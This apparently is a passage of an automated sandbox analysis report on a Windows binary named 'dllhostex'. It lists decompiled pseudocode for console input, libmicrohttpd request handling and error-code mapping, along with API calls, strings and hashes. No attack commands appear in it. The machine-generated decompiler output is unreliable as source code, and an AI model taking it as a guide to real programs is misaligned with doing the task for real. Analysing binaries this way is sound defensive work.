                                                									_t104 = CreateFileA("conout$", 0xc0000000, 3, 0, 3, 0x80, 0);
                                                									if(_t104 != 0xffffffff && GetConsoleScreenBufferInfo(_t104, 0x13d5b30) != 0) {
                                                										asm("lock or [eax], ebp");
                                                									}
                                                									_v44.EventType = 1;
                                                									_v44.KeyEvent = 1;
                                                									_v36 = 0xd0001;
                                                									_v32 = MapVirtualKeyW(0xd, 0);
                                                									_v30 = 0xd;
                                                									_v28 = _t82;
                                                									if(WriteConsoleInputW( *(_t107 + 0x90),  &_v44, 1,  &_v48) == 0) {
                                                										_t82 = GetLastError();
                                                									}
                                                									if(_t104 != 0xffffffff) {
                                                										CloseHandle(_t104);
                                                									}
                                                									if(_t82 == 0) {
                                                										goto L23;
                                                									} else {
                                                										_pop(_t113);
                                                										return E01353717(_v4 ^ _t120, _t113);
                                                									}
                                                								} else {
                                                									if(ReleaseSemaphore( *0x13d5b4c, 1, 0) == 0) {
                                                										goto L25;
                                                									} else {
                                                										L23:
                                                										 *(_t107 + 0x2c) =  *(_t107 + 0x2c) | 0x00200000;
                                                										goto L24;
                                                									}
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						_v8 = 0;
                                                						asm("xorps xmm0, xmm0");
                                                						asm("movups [esp+0x34], xmm0");
                                                						if(WriteConsoleInputW( *(_t107 + 0x90),  &_v24, 1,  &_v52) != 0) {
                                                							goto L24;
                                                						} else {
                                                							GetLastError();
                                                							_pop(_t114);
                                                							return E01353717(_v4 ^ _t120, _t114);
                                                						}
                                                					}
                                                				}
                                                			}
































                                                APIs
                                                • WriteConsoleInputW.KERNEL32(?,?,00000001,000000FF), ref: 0133D797
                                                • GetLastError.KERNEL32 ref: 0133D7A5
                                                • WaitForSingleObject.KERNEL32(000000FF), ref: 0133D7D1
                                                • ReleaseSemaphore.KERNEL32(00000001,00000000), ref: 0133D7F9
                                                • CreateFileA.KERNEL32(conout$,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 0133D825
                                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,013D5B30), ref: 0133D83D
                                                • MapVirtualKeyW.USER32 ref: 0133D868
                                                • WriteConsoleInputW.KERNEL32(?,?,00000001,00000000), ref: 0133D88E
                                                • GetLastError.KERNEL32 ref: 0133D898
                                                • CloseHandle.KERNEL32(00000000), ref: 0133D8A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Console$ErrorInputLastWrite$BufferCloseCreateFileHandleInfoObjectReleaseScreenSemaphoreSingleVirtualWait
                                                • String ID: conout$
                                                • API String ID: 912171342-3200116840
                                                • Opcode ID: 70ce1d40c3802b4893d09f127338f6aa2de42cfa75d3af318f29af94d7eb6ca2
                                                • Instruction ID: 7e44a9628df5388d9a23da2aa94d32da1d11d726f0a36d68fcfbfb00edeb268c
                                                • Opcode Fuzzy Hash: 70ce1d40c3802b4893d09f127338f6aa2de42cfa75d3af318f29af94d7eb6ca2
                                                • Instruction Fuzzy Hash: 7151F0316007009FE7219F7DE884B6ABBE8FF88B18F90462DF95AC6295E771E441CB45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetTickCount64.KERNEL32 ref: 0135045B
                                                • __aulldiv.LIBCMT ref: 01350476
                                                • EnterCriticalSection.KERNEL32(0000009C,-013D5CE0,?,000003E8,00000000), ref: 013504C2
                                                • LeaveCriticalSection.KERNEL32(0000009C,?,000003E8,00000000), ref: 01350531
                                                • LeaveCriticalSection.KERNEL32(0000009C,?,000003E8,00000000), ref: 01350545
                                                Strings
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 013504EF
                                                • (NULL != (connection)->prevX) || ((connection) == (daemon->normal_timeout_head)), xrefs: 013504E0
                                                • (NULL != (connection)->nextX) || ((connection) == (daemon->normal_timeout_tail)), xrefs: 0135054F
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\connection.c, xrefs: 013504EA
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\connection.c, xrefs: 01350559
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0135055E
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$Leave$Count64EnterTick__aulldiv
                                                • String ID: %s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$(NULL != (connection)->nextX) || ((connection) == (daemon->normal_timeout_tail))$(NULL != (connection)->prevX) || ((connection) == (daemon->normal_timeout_head))$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\connection.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\connection.c
                                                • API String ID: 2141774753-1959953275
                                                • Opcode ID: 033cf0c697c3167517b665f8469a982d1088814ac96e4b8ac1a849b9a38426a3
                                                • Instruction ID: bed2291fe1625710d8f12417c0bb7aba9262dc9444fbf3b79bf0f8b36c0f6018
                                                • Opcode Fuzzy Hash: 033cf0c697c3167517b665f8469a982d1088814ac96e4b8ac1a849b9a38426a3
                                                • Instruction Fuzzy Hash: EA3193B1A00702EFE768DF79D445F56B7E8BB04B18F00891DF95E97A41D771B0448BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 74%
                                                			E01351EF0(void* __ecx) {
                                                				void* __ebp;
                                                				intOrPtr* _t29;
                                                				char* _t33;
                                                				intOrPtr _t35;
                                                				intOrPtr _t39;
                                                				void* _t42;
                                                				intOrPtr _t49;
                                                				void* _t52;
                                                				intOrPtr _t53;
                                                				char* _t54;
                                                				void* _t57;
                                                				char* _t58;
                                                				char* _t61;
                                                				intOrPtr _t62;
                                                				char* _t65;
                                                				intOrPtr _t66;
                                                				intOrPtr* _t71;
                                                				char* _t73;
                                                				char* _t85;
                                                				void* _t86;
                                                				intOrPtr _t88;
                                                				void* _t90;
                                                				char* _t91;
                                                				void* _t92;
                                                				void* _t93;
                                                				void* _t94;
                                                				void* _t95;
                                                				void* _t97;
                                                				void* _t98;
                                                
                                                				_t71 =  *((intOrPtr*)(_t93 + 0x18));
                                                				_t92 = __ecx;
                                                				_t91 =  *((intOrPtr*)(_t93 + 0x18));
                                                				 *_t71 = 0;
                                                				_t29 = __ecx + 0x10;
                                                				 *((intOrPtr*)(_t93 + 0x10)) = _t29;
                                                				 *((intOrPtr*)(_t93 + 0xc)) =  *_t29;
                                                				if(_t91 == 0) {
                                                					L21:
                                                					return 1;
                                                				} else {
                                                					while( *_t91 != 0) {
                                                						_t85 = E013551C0(_t91, 0x3d);
                                                						_t33 = E013551C0(_t91, 0x26);
                                                						_t94 = _t93 + 0x10;
                                                						if(_t33 == 0) {
                                                							_t73 = _t91;
                                                							if(_t85 != 0) {
                                                								 *_t85 = 0;
                                                								_t86 = _t85 + 1;
                                                								E01351EC0(_t73);
                                                								_t35 =  *((intOrPtr*)(_t94 + 0x10));
                                                								 *((intOrPtr*)( *((intOrPtr*)(_t35 + 0x50))))( *((intOrPtr*)(_t35 + 0x54)), _t92, _t91);
                                                								E01351EC0(_t86);
                                                								_t39 =  *((intOrPtr*)(_t94 + 0x1c));
                                                								 *((intOrPtr*)( *((intOrPtr*)(_t39 + 0x50))))( *((intOrPtr*)(_t39 + 0x54)), _t92, _t86);
                                                								_t42 = E0134DC30(_t92, 8, _t91, _t86);
                                                								_t95 = _t94 + 0x20;
                                                								if(_t42 != 0) {
                                                									goto L20;
                                                								} else {
                                                									goto L23;
                                                								}
                                                							} else {
                                                								E01351EC0(_t73);
                                                								_t49 =  *((intOrPtr*)(_t94 + 0x10));
                                                								 *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x50))))( *((intOrPtr*)(_t49 + 0x54)), _t92, _t91);
                                                								_t21 = _t85 + 8; // 0x8
                                                								_t52 = E0134DC30(_t92, _t21, _t91, _t85);
                                                								_t95 = _t94 + 0x14;
                                                								if(_t52 == 0) {
                                                									goto L23;
                                                								} else {
                                                									L20:
                                                									 *_t71 =  *_t71 + 1;
                                                									goto L21;
                                                								}
                                                							}
                                                						} else {
                                                							 *_t33 = 0;
                                                							_t53 = _t33 + 1;
                                                							 *((intOrPtr*)(_t94 + 0x24)) = _t53;
                                                							if(_t85 == 0 || _t85 >= _t53) {
                                                								_t54 = E013551C0(_t91, 0x2b);
                                                								_t97 = _t94 + 8;
                                                								while(_t54 != 0) {
                                                									 *_t54 = 0x20;
                                                									_t54 = E013551C0(_t54 + 1, 0x2b);
                                                									_t97 = _t97 + 8;
                                                								}
                                                								_t88 =  *((intOrPtr*)(_t97 + 0x10));
                                                								 *((intOrPtr*)( *((intOrPtr*)(_t88 + 0x50))))( *((intOrPtr*)(_t88 + 0x54)), _t92, _t91);
                                                								_push(0);
                                                							} else {
                                                								 *_t85 = 0;
                                                								_t90 = _t85 + 1;
                                                								_t61 = E013551C0(_t91, 0x2b);
                                                								_t98 = _t94 + 8;
                                                								while(_t61 != 0) {
                                                									 *_t61 = 0x20;
                                                									_t61 = E013551C0(_t61 + 1, 0x2b);
                                                									_t98 = _t98 + 8;
                                                								}
                                                								_t62 =  *((intOrPtr*)(_t98 + 0x10));
                                                								 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x50))))( *((intOrPtr*)(_t62 + 0x54)), _t92, _t91);
                                                								_t65 = E013551C0(_t90, 0x2b);
                                                								_t97 = _t98 + 0x14;
                                                								while(_t65 != 0) {
                                                									 *_t65 = 0x20;
                                                									_t65 = E013551C0(_t65 + 1, 0x2b);
                                                									_t97 = _t97 + 8;
                                                								}
                                                								_t66 =  *((intOrPtr*)(_t97 + 0x10));
                                                								 *((intOrPtr*)( *((intOrPtr*)(_t66 + 0x50))))( *((intOrPtr*)(_t66 + 0x54)), _t92, _t90);
                                                								_push(_t90);
                                                							}
                                                							_push(_t91);
                                                							_t57 = E0134DC30(_t92, 8);
                                                							_t95 = _t97 + 0x14;
                                                							if(_t57 == 0) {
                                                								L23:
                                                								_push("Not enough memory in pool to allocate header record!\n");
                                                								_push( *((intOrPtr*)( *((intOrPtr*)(_t95 + 0x14)))));
                                                								E01351E90();
                                                								_push("<html><head><title>Request too big</title></head><body>Your HTTP header was too big for the memory constraints of this webserver.</body></html>");
                                                								E0134F230(0x1af);
                                                								return 0;
                                                							} else {
                                                								_t58 =  *((intOrPtr*)(_t95 + 0x24));
                                                								_t91 = _t58;
                                                								 *_t71 =  *_t71 + 1;
                                                								if(_t58 != 0) {
                                                									continue;
                                                								} else {
                                                									return _t91 + 1;
                                                								}
                                                							}
                                                						}
                                                						goto L24;
                                                					}
                                                					goto L21;
                                                				}
                                                				L24:
                                                			}

                                                APIs
                                                • ___from_strstr_to_strchr.LIBCMT ref: 01351F2C
                                                • ___from_strstr_to_strchr.LIBCMT ref: 01351F36
                                                • ___from_strstr_to_strchr.LIBCMT ref: 01351F5D
                                                • ___from_strstr_to_strchr.LIBCMT ref: 01351F77
                                                • ___from_strstr_to_strchr.LIBCMT ref: 01351F94
                                                • ___from_strstr_to_strchr.LIBCMT ref: 01351FA7
                                                • ___from_strstr_to_strchr.LIBCMT ref: 01351FC7
                                                • ___from_strstr_to_strchr.LIBCMT ref: 01351FDA
                                                Strings
                                                • <html><head><title>Request too big</title></head><body>Your HTTP header was too big for the memory constraints of this webserver.</body></html>, xrefs: 013520B6
                                                • Not enough memory in pool to allocate header record!, xrefs: 013520A9
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ___from_strstr_to_strchr
                                                • String ID: <html><head><title>Request too big</title></head><body>Your HTTP header was too big for the memory constraints of this webserver.</body></html>$Not enough memory in pool to allocate header record!
                                                • API String ID: 601868998-3379078092
                                                • Opcode ID: a4bf4a150cd5b7925a132f421affb1b7eebaffdd1fed21e378089c0768a1ba77
                                                • Instruction ID: db80bb7901eca2d94cef7f59c69fe064d43305fbeb8997ca099125a42632501f
                                                • Opcode Fuzzy Hash: a4bf4a150cd5b7925a132f421affb1b7eebaffdd1fed21e378089c0768a1ba77
                                                • Instruction Fuzzy Hash: BF51E235600302AFEB51AA2DDC44F6F7BD9EF95A4CF050468FD44C7252EB26E909CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 25%
                                                			E01351510(void* __ecx, char* __edx, intOrPtr _a4) {
                                                				void* __esi;
                                                				intOrPtr _t30;
                                                				intOrPtr _t32;
                                                				intOrPtr _t46;
                                                				void* _t53;
                                                				intOrPtr _t55;
                                                				struct _CRITICAL_SECTION* _t57;
                                                				intOrPtr _t58;
                                                				char* _t62;
                                                
                                                				_t52 = __edx;
                                                				_t53 = __ecx;
                                                				_t62 = __edx;
                                                				if(__ecx == 0) {
                                                					L30:
                                                					return 0;
                                                				} else {
                                                					_t46 = _a4;
                                                					if(_t46 == 0 ||  *((intOrPtr*)(__ecx + 0x1c)) != 0) {
                                                						goto L30;
                                                					} else {
                                                						_t30 =  *((intOrPtr*)(__ecx + 0xac));
                                                						if(_t30 == 4 || _t30 == 9) {
                                                							_t55 =  *((intOrPtr*)(_t53 + 0x10));
                                                							if( *((char*)(_t55 + 0xc4)) != 0) {
                                                								L29:
                                                								return 1;
                                                							} else {
                                                								if( *((char*)(_t53 + 0xdc)) != 0 || ( *(_t55 + 0xe4) & 0x00000008) == 0 || GetCurrentThreadId() ==  *((intOrPtr*)(_t53 + 0x54))) {
                                                									_t32 =  *((intOrPtr*)(_t46 + 0x14));
                                                									if(_t32 == 0 || ( *(_t55 + 0xe4) & 0x00008000) != 0) {
                                                										if(_t62 == 0x65 || _t32 == 0) {
                                                											_t57 = _t46 + 0x1c;
                                                											EnterCriticalSection(_t57);
                                                											 *((intOrPtr*)(_t46 + 0x58)) =  *((intOrPtr*)(_t46 + 0x58)) + 1;
                                                											LeaveCriticalSection(_t57);
                                                											_t58 =  *((intOrPtr*)(_t53 + 0x2c));
                                                											 *((intOrPtr*)(_t53 + 0x1c)) = _t46;
                                                											 *((intOrPtr*)(_t53 + 0xb4)) = _t62;
                                                											if(_t58 == 0) {
                                                												L18:
                                                												if(_t62 < 0xc8 || _t62 == 0xcc || _t62 == 0x130) {
                                                													goto L21;
                                                												}
                                                											} else {
                                                												_t52 = "HEAD";
                                                												if(E01352220(_t58, "HEAD") != 0) {
                                                													L21:
                                                													 *((intOrPtr*)(_t53 + 0x78)) =  *((intOrPtr*)(_t46 + 0x38));
                                                													 *((intOrPtr*)(_t53 + 0x7c)) =  *((intOrPtr*)(_t46 + 0x3c));
                                                												} else {
                                                													goto L18;
                                                												}
                                                											}
                                                											if( *((intOrPtr*)(_t53 + 0xac)) == 4 && _t58 != 0) {
                                                												_t52 = "POST";
                                                												if(E01352220(_t58, "POST") != 0) {
                                                													L26:
                                                													 *((char*)(_t53 + 0xa5)) = 1;
                                                													 *((intOrPtr*)(_t53 + 0xac)) = 9;
                                                												} else {
                                                													_t52 = "PUT";
                                                													if(E01352220(_t58, "PUT") != 0) {
                                                														goto L26;
                                                													}
                                                												}
                                                											}
                                                											if( *((char*)(_t53 + 0xa7)) == 0) {
                                                												E01350CD0(_t53, _t52, _t58);
                                                											}
                                                											goto L29;
                                                										} else {
                                                											_push("Application used invalid status code for \'upgrade\' response!\n");
                                                											_push(_t55);
                                                											E01351E90();
                                                											return 0;
                                                										}
                                                									} else {
                                                										_push("Attempted \'upgrade\' connection on daemon without MHD_ALLOW_UPGRADE option!\n");
                                                										_push(_t55);
                                                										E01351E90();
                                                										return 0;
                                                									}
                                                								} else {
                                                									_push("Attempted to queue response on wrong thread!\n");
                                                									_push(_t55);
                                                									E01351E90();
                                                									return 0;
                                                								}
                                                							}
                                                						} else {
                                                							goto L30;
                                                						}
                                                					}
                                                				}
                                                			}

                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 0135156F
                                                • EnterCriticalSection.KERNEL32(00000000), ref: 013515D9
                                                • LeaveCriticalSection.KERNEL32(00000000), ref: 013515E3
                                                Strings
                                                • Attempted 'upgrade' connection on daemon without MHD_ALLOW_UPGRADE option!, xrefs: 013515A2
                                                • Application used invalid status code for 'upgrade' response!, xrefs: 013515C0
                                                • Attempted to queue response on wrong thread!, xrefs: 0135157A
                                                • PUT, xrefs: 0135164A
                                                • POST, xrefs: 0135163A
                                                • HEAD, xrefs: 013515F9
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$CurrentEnterLeaveThread
                                                • String ID: Application used invalid status code for 'upgrade' response!$Attempted 'upgrade' connection on daemon without MHD_ALLOW_UPGRADE option!$Attempted to queue response on wrong thread!$HEAD$POST$PUT
                                                • API String ID: 2351996187-4085994173
                                                • Opcode ID: 6de4cb9ed4e56b833ed6983416a554135043fddcfb8ba714c0c4f8433c50e46d
                                                • Instruction ID: 3e534f3341f99184ae74d25ddc292a01dc068b4c84a9d36171d81eb18e40c936
                                                • Opcode Fuzzy Hash: 6de4cb9ed4e56b833ed6983416a554135043fddcfb8ba714c0c4f8433c50e46d
                                                • Instruction Fuzzy Hash: 4A417B327017029FFBE69A2DE880F7AB7A4AF40F3DF08012AEE15C2201D775D4558BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E013488E0(void* __ebx, long __ecx, void* __edx, void* __edi, void* __esi) {
                                                				char _v4;
                                                				char _t16;
                                                				void* _t17;
                                                				void* _t19;
                                                				void* _t41;
                                                				long _t42;
                                                				void* _t43;
                                                				void* _t44;
                                                				void* _t46;
                                                				void* _t47;
                                                				long _t50;
                                                
                                                				_t48 = __edx;
                                                				_t42 = __ecx;
                                                				_v4 = 0;
                                                				_t50 = __ecx;
                                                				_t41 = __edx;
                                                				FormatMessageA(0x1300, 0, __ecx, 0x400,  &_v4, 0, 0);
                                                				_t16 = _v4;
                                                				_t53 =  !=  ? _t16 : "Unknown error";
                                                				_t17 = E0135B8FA(2);
                                                				_push( !=  ? _t16 : "Unknown error");
                                                				_push(_t50);
                                                				if(_t41 == 0) {
                                                					_push("(%d) %s");
                                                					_push(_t17);
                                                					E012938B0(_t42);
                                                				} else {
                                                					E012938B0(_t42, _t17, "%s: (%d) %s", _t41);
                                                				}
                                                				_t19 = _v4;
                                                				if(_t19 != 0) {
                                                					LocalFree(_t19);
                                                				}
                                                				DebugBreak();
                                                				E0135EBB9(_t41, _t42, _t48, _t50, _t53);
                                                				asm("int3");
                                                				asm("int3");
                                                				asm("int3");
                                                				asm("int3");
                                                				asm("int3");
                                                				asm("int3");
                                                				asm("int3");
                                                				asm("int3");
                                                				asm("int3");
                                                				asm("int3");
                                                				asm("int3");
                                                				if(_t42 > 0) {
                                                					__eflags = _t42 - 0x10b;
                                                					if(__eflags > 0) {
                                                						__eflags = _t42 - 0x1128;
                                                						if(__eflags > 0) {
                                                							__eflags = _t42 - 0x2af9;
                                                							if(__eflags > 0) {
                                                								__eflags = _t42 - 0x2afc;
                                                								if(_t42 == 0x2afc) {
                                                									goto L73;
                                                								} else {
                                                									goto L72;
                                                								}
                                                							} else {
                                                								if(__eflags == 0) {
                                                									goto L73;
                                                								} else {
                                                									_t43 = _t42 + 0xffffd8ec;
                                                									__eflags = _t43 - 0x3d;
                                                									if(_t43 > 0x3d) {
                                                										goto L72;
                                                									} else {
                                                										switch( *((intOrPtr*)(( *(_t43 + 0x1348e1c) & 0x000000ff) * 4 +  &M01348DBC))) {
                                                											case 0:
                                                												goto L56;
                                                											case 1:
                                                												goto L29;
                                                											case 2:
                                                												goto L60;
                                                											case 3:
                                                												goto L42;
                                                											case 4:
                                                												goto L63;
                                                											case 5:
                                                												return 0xfffff008;
                                                												goto L74;
                                                											case 6:
                                                												return 0xfffff00c;
                                                												goto L74;
                                                											case 7:
                                                												return 0xfffff02e;
                                                												goto L74;
                                                											case 8:
                                                												return 0xfffff01f;
                                                												goto L74;
                                                											case 9:
                                                												return 0xfffff033;
                                                												goto L74;
                                                											case 0xa:
                                                												return 0xfffff007;
                                                												goto L74;
                                                											case 0xb:
                                                												goto L51;
                                                											case 0xc:
                                                												return 0xfffff006;
                                                												goto L74;
                                                											case 0xd:
                                                												goto L65;
                                                											case 0xe:
                                                												goto L57;
                                                											case 0xf:
                                                												goto L59;
                                                											case 0x10:
                                                												return 0xfffff024;
                                                												goto L74;
                                                											case 0x11:
                                                												return 0xfffff01b;
                                                												goto L74;
                                                											case 0x12:
                                                												goto L46;
                                                											case 0x13:
                                                												goto L68;
                                                											case 0x14:
                                                												goto L70;
                                                											case 0x15:
                                                												goto L58;
                                                											case 0x16:
                                                												goto L61;
                                                											case 0x17:
                                                												goto L72;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						} else {
                                                							if(__eflags == 0) {
                                                								goto L73;
                                                							} else {
                                                								__eflags = _t42 - 0x3e3;
                                                								if(__eflags > 0) {
                                                									__eflags = _t42 - 0x522;
                                                									if(__eflags > 0) {
                                                										__eflags = _t42 - 0x781;
                                                										if(__eflags > 0) {
                                                											__eflags = _t42 - 0x8ca;
                                                											if(_t42 != 0x8ca) {
                                                												goto L72;
                                                											} else {
                                                												L46:
                                                												return 0xfffff02b;
                                                											}
                                                										} else {
                                                											if(__eflags == 0) {
                                                												return 0xfffff01d;
                                                											} else {
                                                												_t44 = _t42 - 0x571;
                                                												__eflags = _t44;
                                                												if(_t44 == 0) {
                                                													goto L43;
                                                												} else {
                                                													__eflags = _t44 != 0x47;
                                                													if(_t44 != 0x47) {
                                                														goto L72;
                                                													} else {
                                                														goto L42;
                                                													}
                                                												}
                                                											}
                                                										}
                                                									} else {
                                                										if(__eflags == 0) {
                                                											goto L37;
                                                										} else {
                                                											_t46 = _t42 + 0xfffffc1a;
                                                											__eflags = _t46 - 0xee;
                                                											if(_t46 > 0xee) {
                                                												goto L72;
                                                											} else {
                                                												switch( *((intOrPtr*)(( *(_t46 + 0x1348ccc) & 0x000000ff) * 4 +  &M01348CA0))) {
                                                													case 0:
                                                														goto L29;
                                                													case 1:
                                                														goto L34;
                                                													case 2:
                                                														goto L36;
                                                													case 3:
                                                														goto L43;
                                                													case 4:
                                                														return 0xfffff010;
                                                														goto L74;
                                                													case 5:
                                                														L58:
                                                														return 0xfffff012;
                                                														goto L74;
                                                													case 6:
                                                														L51:
                                                														return 0xfffff005;
                                                														goto L74;
                                                													case 7:
                                                														L65:
                                                														return 0xfffff022;
                                                														goto L74;
                                                													case 8:
                                                														L61:
                                                														return 0xfffff017;
                                                														goto L74;
                                                													case 9:
                                                														L57:
                                                														return 0xfffff011;
                                                														goto L74;
                                                													case 0xa:
                                                														goto L72;
                                                												}
                                                											}
                                                										}
                                                									}
                                                								} else {
                                                									if(__eflags == 0) {
                                                										L56:
                                                										return 0xfffff00f;
                                                									} else {
                                                										__eflags = _t42 - 0x115;
                                                										if(_t42 == 0x115) {
                                                											goto L36;
                                                										} else {
                                                											__eflags = _t42 - 0x2e4;
                                                											if(_t42 != 0x2e4) {
                                                												goto L72;
                                                											} else {
                                                												L29:
                                                												return 0xfffff004;
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						if(__eflags == 0) {
                                                							L73:
                                                							return 0xfffff026;
                                                						} else {
                                                							_t47 = _t42 - 1;
                                                							__eflags = _t47 - 0xe8;
                                                							if(_t47 > 0xe8) {
                                                								L72:
                                                								return 0xfffff002;
                                                							} else {
                                                								switch( *((intOrPtr*)(( *(_t47 + 0x1348bb4) & 0x000000ff) * 4 +  &M01348B58))) {
                                                									case 0:
                                                										return 0xfffff01c;
                                                										goto L74;
                                                									case 1:
                                                										goto L73;
                                                									case 2:
                                                										L63:
                                                										return 0xfffff01e;
                                                										goto L74;
                                                									case 3:
                                                										L37:
                                                										return 0xfffff030;
                                                										goto L74;
                                                									case 4:
                                                										L34:
                                                										return 0xfffff00d;
                                                										goto L74;
                                                									case 5:
                                                										return 0xfffff027;
                                                										goto L74;
                                                									case 6:
                                                										L42:
                                                										return 0xfffff019;
                                                										goto L74;
                                                									case 7:
                                                										return 0xfffff03b;
                                                										goto L74;
                                                									case 8:
                                                										return 0xfffff035;
                                                										goto L74;
                                                									case 9:
                                                										L43:
                                                										return 0xfffff01a;
                                                										goto L74;
                                                									case 0xa:
                                                										return 0xfffff00e;
                                                										goto L74;
                                                									case 0xb:
                                                										L36:
                                                										return 0xfffff029;
                                                										goto L74;
                                                									case 0xc:
                                                										return 0xfffff02f;
                                                										goto L74;
                                                									case 0xd:
                                                										L59:
                                                										return 0xfffff013;
                                                										goto L74;
                                                									case 0xe:
                                                										return 0xfffff015;
                                                										goto L74;
                                                									case 0xf:
                                                										return 0xfffff001;
                                                										goto L74;
                                                									case 0x10:
                                                										L60:
                                                										return 0xfffff016;
                                                										goto L74;
                                                									case 0x11:
                                                										L70:
                                                										return 0xfffff039;
                                                										goto L74;
                                                									case 0x12:
                                                										return 0xfffff02d;
                                                										goto L74;
                                                									case 0x13:
                                                										return 0xfffff020;
                                                										goto L74;
                                                									case 0x14:
                                                										return 0xfffff003;
                                                										goto L74;
                                                									case 0x15:
                                                										L68:
                                                										return 0xfffff031;
                                                										goto L74;
                                                									case 0x16:
                                                										goto L72;
                                                								}
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					return _t42;
                                                				}
                                                				L74:
                                                			}














                                                0x00000000
                                                0x01348a70
                                                0x01348a70
                                                0x01348a73
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01348a73
                                                0x01348a6e
                                                0x01348a66
                                                0x01348a24
                                                0x01348a24
                                                0x00000000
                                                0x01348a26
                                                0x01348a26
                                                0x01348a2c
                                                0x01348a32
                                                0x00000000
                                                0x01348a38
                                                0x01348a3f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01348a51
                                                0x00000000
                                                0x00000000
                                                0x01348af6
                                                0x01348afb
                                                0x00000000
                                                0x00000000
                                                0x01348acc
                                                0x01348ad1
                                                0x00000000
                                                0x00000000
                                                0x01348b20
                                                0x01348b25
                                                0x00000000
                                                0x00000000
                                                0x01348b08
                                                0x01348b0d
                                                0x00000000
                                                0x00000000
                                                0x01348af0
                                                0x01348af5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01348a3f
                                                0x01348a32
                                                0x01348a24
                                                0x013489fc
                                                0x013489fc
                                                0x01348aea
                                                0x01348aef
                                                0x01348a02
                                                0x01348a02
                                                0x01348a08
                                                0x00000000
